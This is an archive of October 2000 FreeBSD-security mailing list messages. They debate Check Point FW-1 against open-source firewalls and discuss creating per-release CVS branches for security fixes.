Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id A95D837B502 for ; Sat, 7 Oct 2000 10:41:50 -0700 (PDT)
Received: (from avalon@localhost) by cairo.anu.edu.au (8.9.3/8.9.3) id EAA09090; Sun, 8 Oct 2000 04:41:39 +1100 (EST)
From: Darren Reed
Message-Id: <200010071741.EAA09090@cairo.anu.edu.au>
Subject: Re: Check Point FW-1
To: craig@allmaui.com (Craig Cowen)
Date: Sun, 8 Oct 2000 04:41:39 +1100 (Australia/NSW)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <39DEDD2B.E5BF4463@allmaui.com> from "Craig Cowen" at Oct 07, 2000 01:22:03 AM
X-Mailer: ELM [version 2.5 PL1]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In some mail from Craig Cowen, sie said:
>
> Thanks,
> They are going to put it on an NT machine.
> They don't trust ipfilter or anything else that is not commercial.
> Maybe I could get some suits to guarantee it with a corporate label.
>
> Craig

Some questions... who is running this project? Who will be running the
systems? And who is "they" in the "They are going..."?

If you're the one who is running the systems then maybe you should make
it abundantly clear that you've no desire at all to administer an NT
firewall. Unless you're really inexperienced, there should not be a
problem with finding a better job.

If all they are interested in is commercial, then Sun Solaris with FW-1
on top of it is a better choice than NT. If they start saying price is
a factor, tell them Solaris x86 is cheaper, on the same hardware, than
NT.

Maybe you should print out the latest Black Hat briefing and drop it on
their desk with an attached note saying something appropriate. You
might want to add a note about how the best fix for some of these
problems was to install a non-commercial firewall product to protect it.

Challenge them on why they should trust a commercial product. Get them
to actually read the license if they believe it is inherently better.
I was bold enough to suggest developing software that was actually
warranted for a use only to have someone point out that if it ever
crashes for any person they are then able to sue you.
No software company wants that to happen.

Darren

From owner-freebsd-security Sat Oct 7 11:40:12 2000
Delivered-To: freebsd-security@freebsd.org
Received: from firefly.prairienet.org (firefly.prairienet.org [192.17.3.3]) by hub.freebsd.org (Postfix) with ESMTP id CD7FA37B671 for ; Sat, 7 Oct 2000 11:40:01 -0700 (PDT)
Received: from sherman.spotnet (slip-82.prairienet.org [192.17.3.102]) by firefly.prairienet.org (8.9.3/8.9.3) with ESMTP id NAA04385; Sat, 7 Oct 2000 13:39:49 -0500 (CDT)
Date: Sat, 7 Oct 2000 13:39:57 -0500 (CDT)
From: David Talkington
X-Sender: dtalk@sherman.spotnet
To: Craig Cowen
Cc: Darren Reed , "freebsd-security@FreeBSD.ORG"
Subject: Re: Check Point FW-1
In-Reply-To: <39DEDD2B.E5BF4463@allmaui.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

>Thanks,
>They are going to put it on an NT machine.
>They don't trust ipfilter or anything else that is not commercial.
>Maybe I could get some suits to guarantee it with a corporate label.

Two possible angles:

a) it's natural for the boss to distrust what he or she doesn't
understand (this is the most charitable explanation). If you have a
good relationship with management, they truly care about data security,
and they trust you, you'll have to understand their fear and try to
educate them (by educating yourself to the nines).

b) To a boss concerned about the bottom line, a purchase equals
accountability (e.g., someone to sue when it breaks). This is (in my
humble opinion) typical of management that doesn't really care about
security of the company's data per se, but just wants their personal
asses covered.

Academics aside, you haven't said what your role is in this company,
but if you're placed in a position of responsibility for an
organization's security, and not given the authority to make decisions
affecting that security, you'd better have a current resume. =)

- -d

- --
David Talkington
Community Networking Initiative
dtalk@prairienet.org
217-244-1962
PGP key: http://www.prairienet.org/~dtalk/dt000823.asc

Craig Cowen wrote:

>
>Craig
>
>Darren Reed wrote:
>
>> In some mail from Craig Cowen, sie said:
>> >
>> > The big cheeses at work want to use check point instead of ipf or any
>> > other open source solution.
>> > Can anybody help me with vulnerabilities to this so that I can change
>> > their minds?
>>
>> Tell them that IP Filter is the software which protects Firewall-1 from
>> the Internet when running on Solaris - you have to go with naked FW-1 on
>> NT. There are two factors to this equation, however. FW-1 is typically
>> deployed on Solaris/NT machines although now the Nokia box makes up a
>> large number of those sales. The Nokia boxes run IPSO which was, long
>> ago, FreeBSD (I'm told it no longer bears much resemblance).
>>
>> Darren

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8
Comment: Made with pgp4pine 1.75-6

iQEVAwUBOd9uAb1ZYOtSwT+tAQFIYAf7B9wLYqVkBrHKbQp5Wmb+4CIwYZG7XLQH
wcypMIu2pjjjvzzSq0DTK7GI0jWXn+1tcgUsID9S3MGseyZKDcmYIsjU0RlgzWBp
AulCZ2xoBzpx9VK6Fca9OcOGgmJZFZwBDWgMaU2R0mifye2GMS3qtNPTZyBKa8lN
jGRIa+YoWq9a8gc9N19fIvpML3xawfONSaP2kn0yvyFEMSV8PA/EP4CZe3qPq5/B
gL6jwLger6G4Fn4pte+PCfsBckSEOGZ+pfUM5GqEbT6zXGkSusT+iypZYlEKAbBn
WU14Pbb0Cv4bjeIbaYPpMLTFskiajQgfShM30zeJp05xNjjclc+NDw==
=7L5Q
-----END PGP SIGNATURE-----

From owner-freebsd-security Sat Oct 7 14:46:51 2000
Delivered-To: freebsd-security@freebsd.org
Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id 23BA437B502; Sat, 7 Oct 2000 14:46:41 -0700 (PDT)
Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id QAA18820; Sat, 7 Oct 2000 16:46:23 -0500 (CDT) (envelope-from jeff-ml@mountin.net)
Received: from dial-88.max1.wa.cyberlynk.net(207.227.118.88) by peak.mountin.net via smap (V1.3) id sma018818; Sat Oct 7 16:46:20 2000
Message-Id: <4.3.2.20001007161924.00b72460@207.227.119.2>
X-Sender: jeff-ml@207.227.119.2
X-Mailer: QUALCOMM Windows Eudora Version 4.3
Date: Sat, 07 Oct 2000 16:45:49 -0500
To: "Matthew D. Fuller" , Jordan Hubbard
From: "Jeffrey J. Mountin"
Subject: Re: Stable branch
Cc: Robert Watson , John Baldwin , freebsd-security@FreeBSD.ORG, cvs-committers@FreeBSD.ORG
In-Reply-To: <20001006180148.B29088@futuresouth.com>
References: <3175.970802405@winston.osd.bsdi.com> <3175.970802405@winston.osd.bsdi.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 06:01 PM 10/6/00 -0500, Matthew D. Fuller wrote:

--snip--

>I think it might actually be easier to suck up and branch each release,
>and stick security fixes on the branch, than to shoot this idea down
>every few months for the rest of our lives ;)

Then you might want to consider doing all the extra work involved in such a
scheme or buy a lot of gifts for those that must then commit to 6 branches
for 3.x and 3 (so far) for 4.x, etc. You seem to have completely missed
Jordan's point this time and his previous point on wishing that committers
were better at merging stuff back from -current.

The idea of binary patches for releases is better. Just hope that any such
mechanism wouldn't end up like IRIX and be more of a PITA than it is worth.
Also means more time and resources are needed when bug/security fixes need
to be merged back. A required patch set would be easier to avoid problems
with a mix 'n' match scheme.

Also seem to recall that branches are "expensive" with CVS. Not sure if
that is just a one-time deal when laying a tag or a continuing liability.

Regardless of the ideas that have cropped up on the various lists recently,
it seems that the true "armchair generals" seem to forget the troops can
just walk away without being deserters, so making things more difficult is
NOT going to mean better results if the troops are not happy or leave the
field. You could say I'm tired of hearing ideas that make *their* life
better and don't consider the hassles induced by changing the production
method.
I'm not picking on Matt either, but it would explain why some ideas are
shot down on a regular basis (ie bad/difficult then and still are).

Jeff Mountin - jeff@mountin.net
Systems/Network Administrator
FreeBSD - the power to serve

From owner-freebsd-security Sat Oct 7 15:51:43 2000
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 72DC737B503; Sat, 7 Oct 2000 15:51:38 -0700 (PDT)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id SAA87815; Sat, 7 Oct 2000 18:51:24 -0400 (EDT) (envelope-from robert@fledge.watson.org)
Date: Sat, 7 Oct 2000 18:51:23 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
To: "Jeffrey J. Mountin"
Cc: "Matthew D. Fuller" , Jordan Hubbard , John Baldwin , freebsd-security@FreeBSD.ORG, cvs-committers@FreeBSD.ORG
Subject: Re: Stable branch
In-Reply-To: <4.3.2.20001007161924.00b72460@207.227.119.2>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, 7 Oct 2000, Jeffrey J. Mountin wrote:

> >I think it might actually be easier to suck up and branch each release,
> >and stick security fixes on the branch, than to shoot this idea down
> >every few months for the rest of our lives ;)
>
> Then you might want to consider doing all the extra work involved in such a
> scheme or buy a lot of gifts for those that must then commit to 6 branches
> for 3.x and 3 (so far) for 4.x, etc. You seem to have completely missed
> Jordan's point this time and his previous point on wishing that committers
> were better at merging stuff back from -current.

You seem to misunderstand. No one is asking the majority of committers to
commit to the release branches--in fact, that was specifically
*prohibited* in the recommendation of a branch for each release. These
branches would only exist for the purposes of release-related activity
(modify the version numbers in the release branch, not the -STABLE
branch), emergency back-ports during and immediately after the release
itself, ERRATA entries for the release, and for security bugfixes. No new
features. No new documentation work. Show stopper fixes only. This is
for people who want to use a release, and have it be secure and work, not
for people who want to sit on -STABLE. And if people who backport to
-STABLE do any kind of decent reviewing job, and there's an adequate code
freeze prior to the release branchpoint, then commits to -RELEASE branches
should be *very* infrequent.
Each commit (or set of related commits) on the -RELEASE branch would
probably be designated a resulting patch level so that binary updates
could be built based on it, constituting the binary update related to the
security fix. The point of this branch is to allow our standard version
control and distribution mechanisms to provide access to a
version-controlled release patchlevel system.

Robert N M Watson

robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
TIS Labs at Network Associates, Safeport Network Services

From owner-freebsd-security Sat Oct 7 16:47:51 2000
Delivered-To: freebsd-security@freebsd.org
Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 51B4C37B66D; Sat, 7 Oct 2000 16:47:43 -0700 (PDT)
Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 8702F1C69; Sat, 7 Oct 2000 19:47:30 -0400 (EDT)
Date: Sat, 7 Oct 2000 19:47:30 -0400
From: Bill Fumerola
To: "Jeffrey J. Mountin"
Cc: "Matthew D. Fuller" , Jordan Hubbard , Robert Watson , John Baldwin , freebsd-security@FreeBSD.ORG, cvs-committers@FreeBSD.ORG
Subject: Re: Stable branch
Message-ID: <20001007194730.T38472@jade.chc-chimes.com>
References: <3175.970802405@winston.osd.bsdi.com> <3175.970802405@winston.osd.bsdi.com> <20001006180148.B29088@futuresouth.com> <4.3.2.20001007161924.00b72460@207.227.119.2>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <4.3.2.20001007161924.00b72460@207.227.119.2>; from jeff-ml@mountin.net on Sat, Oct 07, 2000 at 04:45:49PM -0500
X-Operating-System: FreeBSD 3.3-STABLE i386
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, Oct 07, 2000 at 04:45:49PM -0500, Jeffrey J. Mountin wrote:

> Then you might want to consider doing all the extra work involved in such a
> scheme or buy a lot of gifts for those that must then commit to 6 branches
> for 3.x and 3 (so far) for 4.x, etc. You seem to have completely missed
> Jordan's point this time and his previous point on wishing that committers
> were better at merging stuff back from -current.

Speaking as a {lazy,busy} committer: Merging to one branch is a pain,
merging to multiple branches is even worse. Merging to RELENG_4_1,
RELENG_4_2 etc means I would have to have a machine with the latest
-STABLE of those branches, which is something I doubt I'll have every
permutation of...

BUT

If all we did was merge critical security "oh-my-god" type fixes into those
branches I'd be all for it (I'm not taking into account the CVS hell this
would make in our RCS files, however..).

--
Bill Fumerola - Network Architect, BOFH / Chimes, Inc.
billf@chimesnet.com / billf@FreeBSD.org

From owner-freebsd-security Sat Oct 7 16:52:48 2000
Delivered-To: freebsd-security@freebsd.org
Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 4D52137B503; Sat, 7 Oct 2000 16:52:45 -0700 (PDT)
Received: (from kris@localhost) by citusc17.usc.edu (8.9.3/8.9.3) id QAA17131; Sat, 7 Oct 2000 16:53:22 -0700 (PDT)
Date: Sat, 7 Oct 2000 16:53:22 -0700
From: Kris Kennaway
To: Robert Watson
Cc: "Jeffrey J. Mountin" , "Matthew D. Fuller" , Jordan Hubbard , John Baldwin , freebsd-security@FreeBSD.org, cvs-committers@FreeBSD.org
Subject: Re: Stable branch
Message-ID: <20001007165322.A17115@citusc17.usc.edu>
References: <4.3.2.20001007161924.00b72460@207.227.119.2>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from rwatson@FreeBSD.org on Sat, Oct 07, 2000 at 06:51:23PM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, Oct 07, 2000 at 06:51:23PM -0400, Robert Watson wrote:

> You seem to misunderstand. No one is asking the majority of committers to
> commit to the release branches--in fact, that was specifically
> *prohibited* in the recommendation of a branch for each release. These
> branches would only exist for the purposes of release-related activity
> (modify the version numbers in the release branch, not the -STABLE
> branch), emergency back-ports during and immediately after the release
> itself, ERRATA entries for the release, and for security bugfixes. No new
> features. No new documentation work. Show stopper fixes only.

You know, I'm starting to think this could actually work. I have no idea
of the impact it would have on CVS though - Peter?

Kris

From owner-freebsd-security Sat Oct 7 17:10:32 2000
Delivered-To: freebsd-security@freebsd.org
Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id 25A6237B677 for ; Sat, 7 Oct 2000 17:09:38 -0700 (PDT)
Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13i41w-0002g0-00; Sun, 08 Oct 2000 02:09:28 +0200
Date: Sun, 8 Oct 2000 02:09:28 +0200 (IST)
From: Roman Shterenzon
To: Brian Reichert
Cc: "freebsd-security@FreeBSD.ORG"
Subject: Re: Check Point FW-1
In-Reply-To: <20001007133804.C54883@numachi.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, 7 Oct 2000, Brian Reichert wrote:

> On Sat, Oct 07, 2000 at 05:49:09PM +0200, Roman Shterenzon wrote:
> > Hi,
> > Speaking for myself (Xpert are an official CheckPoint dealer) I can say that
> > although FW-1 might have had some problems, it's quite good.
> > It's quite secure as well (usually installed on Solaris/(sparc|i386) )
>
> I've never installed it. I 'inherited' a CheckPoint box running
> under Solaris, and, from an internal net had to break in to the
> box to grant myself admin privs.
>
> I got in because UNIX services under SunOS 5.6 were misconfigured.
> That's not CheckPoint's fault. But I don't think it's fair to
> claim that the presence of CheckPoint makes the box secure...

Again speaking for myself - I doubt that you or anybody else could have
managed to break into a solaris firewall I've installed (properly), unless
of course there's some bug in CP fw1 which makes it possible.
Of course the underlying os must be secure, and (!) the rules must be
secure. The rules shouldn't have allowed you to talk to any service on
the fw in the first place. So.. it was BADLY misconfigured.
Again, I think for a commercial solution FW-1 is very good.

--Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel.
Tel: +972-9-9522361 ]

From owner-freebsd-security Sat Oct 7 18:03:19 2000
Delivered-To: freebsd-security@freebsd.org
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 0557437B503; Sat, 7 Oct 2000 18:03:14 -0700 (PDT)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id VAA99935; Sat, 7 Oct 2000 21:01:51 -0400 (EDT) (envelope-from wollman)
Date: Sat, 7 Oct 2000 21:01:51 -0400 (EDT)
From: Garrett Wollman
Message-Id: <200010080101.VAA99935@khavrinen.lcs.mit.edu>
To: Kris Kennaway
Cc: freebsd-security@FreeBSD.org, cvs-committers@FreeBSD.org
Subject: Re: Stable branch
In-Reply-To: <20001007165322.A17115@citusc17.usc.edu>
References: <4.3.2.20001007161924.00b72460@207.227.119.2> <20001007165322.A17115@citusc17.usc.edu>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

< said:

> I have no idea of the impact it would have on CVS though - Peter?

The cvsup servers get put through hell whenever any tag is laid down,
but I would be astonished if they got hammered any worse for two tags
than they currently do for one.

-GAWollman

From owner-freebsd-security Sat Oct 7 18:10:56 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail.enteract.com (mail.enteract.com [207.229.143.33]) by hub.freebsd.org (Postfix) with ESMTP id 487EB37B503 for ; Sat, 7 Oct 2000 18:10:52 -0700 (PDT)
Received: from shell-1.enteract.com (jrs@shell-1.enteract.com [207.229.143.40]) by mail.enteract.com (8.9.3/8.9.3) with SMTP id UAA72281; Sat, 7 Oct 2000 20:10:42 -0500 (CDT) (envelope-from jrs@enteract.com)
Date: Sat, 7 Oct 2000 20:10:42 -0500 (CDT)
From: John Sconiers
To: Roman Shterenzon
Cc: Brian Reichert , "freebsd-security@FreeBSD.ORG"
Subject: Re: Check Point FW-1
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

If you're going to use fw1 use it on nokia.

From owner-freebsd-security Sat Oct 7 19:28:16 2000
Delivered-To: freebsd-security@freebsd.org
Received: from shell.futuresouth.com (shell.futuresouth.com [198.78.58.28]) by hub.freebsd.org (Postfix) with ESMTP id 1531137B502; Sat, 7 Oct 2000 19:28:07 -0700 (PDT)
Received: (from fullermd@localhost) by shell.futuresouth.com (8.9.3/8.9.3) id VAA25451; Sat, 7 Oct 2000 21:27:12 -0500 (CDT)
Date: Sat, 7 Oct 2000 21:27:12 -0500
From: "Matthew D. Fuller"
To: Bill Fumerola
Cc: "Jeffrey J. Mountin" , Jordan Hubbard , Robert Watson , John Baldwin , freebsd-security@FreeBSD.ORG, cvs-committers@FreeBSD.ORG
Subject: Re: Stable branch
Message-ID: <20001007212711.A24996@futuresouth.com>
References: <3175.970802405@winston.osd.bsdi.com> <3175.970802405@winston.osd.bsdi.com> <20001006180148.B29088@futuresouth.com> <4.3.2.20001007161924.00b72460@207.227.119.2> <20001007194730.T38472@jade.chc-chimes.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20001007194730.T38472@jade.chc-chimes.com>; from billf@chimesnet.com on Sat, Oct 07, 2000 at 07:47:30PM -0400
X-OS: FreeBSD
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, Oct 07, 2000 at 07:47:30PM -0400, a little birdie told me
that Bill Fumerola remarked
>
> Speaking as a {lazy,busy} committer: Merging to one branch is a pain,
> merging to multiple branches is even worse. Merging to RELENG_4_1,
> RELENG_4_2 etc means I would have to have a machine with the latest
> -STABLE of those branches, which is something I doubt I'll have every
> permutation of...
>
> BUT
>
> If all we did was merge critical security "oh-my-god" type fixes into those
> branches I'd be all for it (I'm not taking into account the CVS hell this
> would make in our RCS files, however..).

(reply to all the messages, public and private about this in one place)

That was my intention there; god knows I wouldn't want to deal with
having 8 -STABLE branches at once! But a per-release branch for the 'oh
shit' security holes, and possibly showstopper bugs, might be doable. I
understand the branching does fun things to CVS, so it's a tradeoff
either way; CVS twiddleadge and rare (hopefully VERY rare; we don't make
mistakes, do we? ;) committer time, vs. easier updates to specific
releases.
And if we bump patchlevels on the release (3.5.1-RELEASE p2 or something
similar in uname), we can make it easier on the users to see when they
have a patched version.

Possible fun problems I see include rolling releases, having them on FTP
sites, etc. OTOH, keeping only the latest patchlevel on the FTP sites (I
doubt there'd often be more than 1 or possibly two patches per release,
big security holes in the base system aren't THAT common) would make it
easier to keep new installs having secure systems, and just keeping the
per-release branches updated for X time (1 year? 2 years?) would keep it
from snowballing out of control as we go through 5-STABLE, 6-STABLE, etc.

--
Matthew Fuller (MF4839)     |    fullermd@over-yonder.net
Unix Systems Administrator  |    fullermd@futuresouth.com
Specializing in FreeBSD     |    http://www.over-yonder.net/
"The only reason I'm burning my candle at both ends, is because I
haven't figured out how to light the middle yet"

From owner-freebsd-security Sat Oct 7 20:01:13 2000
Delivered-To: freebsd-security@freebsd.org
Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id AA8AB37B66C; Sat, 7 Oct 2000 20:01:08 -0700 (PDT)
Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id WAA20262; Sat, 7 Oct 2000 22:01:07 -0500 (CDT) (envelope-from jeff-ml@mountin.net)
Received: from dial-73.max1.wa.cyberlynk.net(207.227.118.73) by peak.mountin.net via smap (V1.3) id sma020256; Sat Oct 7 22:00:40 2000
Message-Id: <4.3.2.20001007214506.00bb7c10@207.227.119.2>
X-Sender: jeff-ml@207.227.119.2
X-Mailer: QUALCOMM Windows Eudora Version 4.3
Date: Sat, 07 Oct 2000 21:59:48 -0500
To: Robert Watson
From: "Jeffrey J. Mountin"
Subject: Re: Stable branch
Cc: "Matthew D. Fuller", Jordan Hubbard, John Baldwin, freebsd-security@FreeBSD.ORG, cvs-committers@FreeBSD.ORG
References: <4.3.2.20001007161924.00b72460@207.227.119.2>

At 06:51 PM 10/7/00 -0400, Robert Watson wrote:
>You seem to misunderstand. No one is asking the majority of committers to
>commit to the release branches--in fact, that was specifically
>*prohibited* in the recommendation of a branch for each release. These
>branches would only exist for the purposes of release-related activity
>(modify the version numbers in the release branch, not the -STABLE
>branch), emergency back-ports during and immediately after the release
>itself, ERRATA entries for the release, and for security bugfixes. No new
>features. No new documentation work. Show stopper fixes only.

Now your earlier proposal makes better sense. A lot more for the CVS-meisters to deal with, but they can answer that magic question.

Also may be an issue to branch old releases, then it might be worth doing all the branching at one time and disallowing access. Then the question would be for how long do we want to do patches for old releases.

One other idea that cropped up would be if we want to set this up for the more troublesome releases like 3.2 to force them to upgrade to a later version. Think that only 3.4+ should be considered due to a large enough install base to consider.
Jeff Mountin - jeff@mountin.net
Systems/Network Administrator
FreeBSD - the power to serve

From owner-freebsd-security Sat Oct 7 20:38:54 2000
Date: Sat, 7 Oct 2000 23:36:05 -0400 (EDT)
From: Robert Watson
To: "Jeffrey J. Mountin"
Cc: "Matthew D. Fuller", Jordan Hubbard, John Baldwin, freebsd-security@FreeBSD.ORG, cvs-committers@FreeBSD.ORG
Subject: Re: Stable branch
In-Reply-To: <4.3.2.20001007214506.00bb7c10@207.227.119.2>

On Sat, 7 Oct 2000, Jeffrey J. Mountin wrote:

> Now your earlier proposal makes better sense. A lot more for the
> CVS-meisters to deal with, but they can answer that magic question.
> Also may be an issue to branch old releases, then it might be worth
> doing all the branching at one time and disallowing access.

Well, at least for the purposes of the release engineer, the major change is adding a "-b" to the CVS tag operation. However, an important question, which you raised in a prior e-mail, is whether or not this places an undue burden on CVS due to expensive branch handling. My hope is that it would not, but presumably a CVS meister (Peter?) should enlighten us. I have no idea how branching for older versions would work: it may be that we just start doing this now, for new releases.

> Then the question would be for how long do we want to do patches for old
> releases.

Which is a question we've always been faced with, only hopefully this will make life easier. With the recent security issues, we've had some luck in identifying people who are willing to backport fixes (Alfred, Jeroen). I'd certainly be willing to pick up some load, and Kris has demonstrated interest in covering the most recent -STABLE and -CURRENT trees.

> One other idea that cropped up would be if we want to set this up for
> the more troublesome releases like 3.2 to force them to upgrade to a
> later version. Think that only 3.4+ should be considered due to a large
> enough install base to consider.
Yes, I think it would be reasonable, for older versions and -STABLE branches, to limit the scope in which fixes are available -- i.e., put them into the head of the -STABLE branch, and the last -RELEASE on the branch.

Thanks,

Robert N M Watson
robert@fledge.watson.org http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
TIS Labs at Network Associates, Safeport Network Services

From owner-freebsd-security Sat Oct 7 20:51:39 2000
Message-Id: <200010080351.VAA02166@harmony.village.org>
To: Robert Watson
Subject: Re: Stable branch
Cc: freebsd-security@FreeBSD.org, cvs-committers@FreeBSD.org
In-reply-to: Your message of "Sat, 07 Oct 2000 23:36:05 EDT."
Date: Sat, 07 Oct 2000 21:51:32 -0600
From: Warner Losh

In message Robert Watson writes:
: Well, at least for the purposes of the release engineer, the major change
: is adding a "-b" to the CVS tag operation. However, an important
: question, which you raised in a prior e-mail, is whether or not this
: places an undue burden on CVS due to expensive branch handling. My hope
: is that it would not, but presumably a CVS meister (Peter?) should
: enlighten us. I have no idea how branching for older versions would work:
: it may be that we just start doing this now, for new releases.

You don't need to branch each release. You only need to branch those files that actually change. Normally a branch needs a tag at the branch, but we wouldn't in this case because we'd already have one (the release tag would already be there). This would put very little load on the cvs repo.

Warner

From owner-freebsd-security Sat Oct 7 21:27:28 2000
From: Darren Reed
Message-Id: <200010080427.PAA19412@cairo.anu.edu.au>
Subject: Re: Check Point FW-1
To: dtalk@prairienet.org (David Talkington)
Date: Sun, 8 Oct 2000 15:27:07 +1100 (Australia/NSW)
Cc: craig@allmaui.com (Craig Cowen), avalon@coombs.anu.edu.au (Darren Reed), freebsd-security@FreeBSD.ORG
In-Reply-To: from "David Talkington" at Oct 07, 2000 01:39:57 PM

In some mail from David Talkington, sie said:
>
> b) To a boss concerned about the bottom line, a purchase equals
> accountability (e.g., someone to sue when it breaks). This is (in my
> humble opinion) typical of management that doesn't really care about
> security of the company's data per se, but just wants their personal
> asses covered.

For the record, you can't sue anyone who's got the "standard" software license/disclaimer over the failure of it to perform or be bug free. Read it one day and actually see what it's all about.

What is really the difference is being able to dial 1-800-FIREWALL and have someone help you out, etc.

Darren

From owner-freebsd-security Sat Oct 7 21:40:00 2000
Message-ID: <39DFFBE9.546DFE24@softweyr.com>
Date: Sat, 07 Oct 2000 22:45:30 -0600
From: Wes Peters
Organization: Softweyr LLC
To: Darren Reed
Cc: David Talkington, Craig Cowen, freebsd-security@FreeBSD.ORG
Subject: Re: Check Point FW-1
References: <200010080427.PAA19412@cairo.anu.edu.au>

Darren Reed wrote:
>
> In some mail from David Talkington, sie said:
> >
> > b) To a boss concerned about the bottom line, a purchase equals
> > accountability (e.g., someone to sue when it breaks). This is (in my
> > humble opinion) typical of management that doesn't really care about
> > security of the company's data per se, but just wants their personal
> > asses covered.
>
> For the record, you can't sue anyone who's got the "standard" software
> license/disclaimer over the failure of it to perform or be bug free.
> Read it one day and actually see what it's all about.

But you can threaten to stop paying them tens of thousands of dollars in customer/technical non-support contract fees if they don't come up with a fix real fast. You should sell support contracts for ipfilter, Darren. The people could threaten YOU with cutting off the contracts you'll learn to hate. Small incentive.

> What is really the difference is being able to dial 1-800-FIREWALL and
> have someone help you out, etc.

Well, at least have someone to answer the phone and listen while you rant.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters Softweyr LLC
wes@softweyr.com http://softweyr.com/

From owner-freebsd-security Sat Oct 7 21:45:30 2000
From: Darren Reed
Message-Id: <200010080445.PAA20792@cairo.anu.edu.au>
Subject: Re: Check Point FW-1
To: wes@softweyr.com (Wes Peters)
Date: Sun, 8 Oct 2000 15:45:18 +1100 (Australia/NSW)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <39DFFBE9.546DFE24@softweyr.com> from "Wes Peters" at Oct 07, 2000 10:45:30 PM

In some mail from Wes Peters, sie said:
>
> You should sell support contracts for ipfilter, Darren. The people could
> threaten YOU with cutting off the contracts you'll learn to hate. Small
> incentive.

I've never been convinced that there's a real market for this given that support contracts are never cheap. If anyone has a blank cheque they're willing to hand over (or wants to seriously talk about this), please let me know. Somehow I think I prefer the idea to just cut code :-)

o-o

Darren

p.s. yes, I'm serious about asking others if they're serious.

From owner-freebsd-security Sat Oct 7 23:08:11 2000
Message-ID: <39E010FE.8CAA2CB1@softweyr.com>
Date: Sun, 08 Oct 2000 00:15:26 -0600
From: Wes Peters
Organization: Softweyr LLC
To: Gregory Sutter
Cc: Craig Cowen, freebsd-security@FreeBSD.ORG
Subject: Re: Check Point FW-1
References: <39DEBB51.E51BACFB@allmaui.com> <20001006230628.L23587@klapaucius.zer0.org>

Gregory Sutter wrote:
>
> On 2000-10-06 22:57 -0700, Craig Cowen wrote:
> > The big cheeses at work want to use check point instead of ipf or any
> > other open source solution.
> > Can anybody help me with vulnerabilities to this so that I can change
> > their minds?
>
> Go search the Bugtraq archives at http://www.securityfocus.com/ for
> lots of Checkpoint fun.

FW-1 sucks. Mumble mumble NDA mumble mumble can't say any more mumble mumble mumble. "Oh God, and I thought these smelled bad on the outside."

There are several commercial firewall products based on FreeBSD (or, shudder, Linux) that are better tools in the hands of someone who will take them to educate themselves. A BSD box running ipfilter or ipfw is very straightforward to secure, and offers reasonably easy tools for remote configuration like ssh. Others have mentioned a couple of commercial alternatives; add NetMax and GnatBox (right?) to this list.

